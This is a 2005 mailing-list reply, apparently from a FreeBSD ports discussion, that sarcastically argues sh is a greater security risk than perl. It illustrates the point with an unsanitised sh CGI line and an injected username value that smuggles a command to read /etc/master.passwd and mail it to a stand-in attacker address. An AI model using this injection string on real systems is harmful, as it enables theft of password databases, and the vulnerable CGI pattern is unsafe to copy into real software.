perl and ports

Loren M. Lang lorenl at alzatex.com
Fri Feb 4 19:44:46 PST 2005

On Tue, Jan 25, 2005 at 11:41:56PM +0100, Gert Cuykens wrote:
> ps who is the imake developer ?
>
> Believe me i am going to mail every developer where perl comes in
> between me and the application :P

Actually, I think you should work on sh first, it's a much bigger
security hazard than perl.  If you've ever written much sh, you'd
realize with it's much loser syntax, it's easy to get into trouble.  At
least perl provides use strict and -Tw.  Someone using sh to write cgi
scripts is the worst.  Imagine someone writing the following like for a
sh cgi script where $USERNAME is a cgi paramater passed into the
following script:

echo "<HTML><HEAD><TITLE>Welcome, " $USERNAME "</TITLE></HEAD>"

What if someone wrote the following username and apache was running as
root:

charlie; cat /etc/master.passwd | mail haZ0rZ at deathtoyou.com; echo

Well, they would just of gotten a hold of your entire database of
usernames and password and you'd never know about it.  So therefore sh
is a MUCH bigger security risk and we should work on removing it as a
requirement of EVERY single app that currently uses it so we don't have
to worry about it being installed.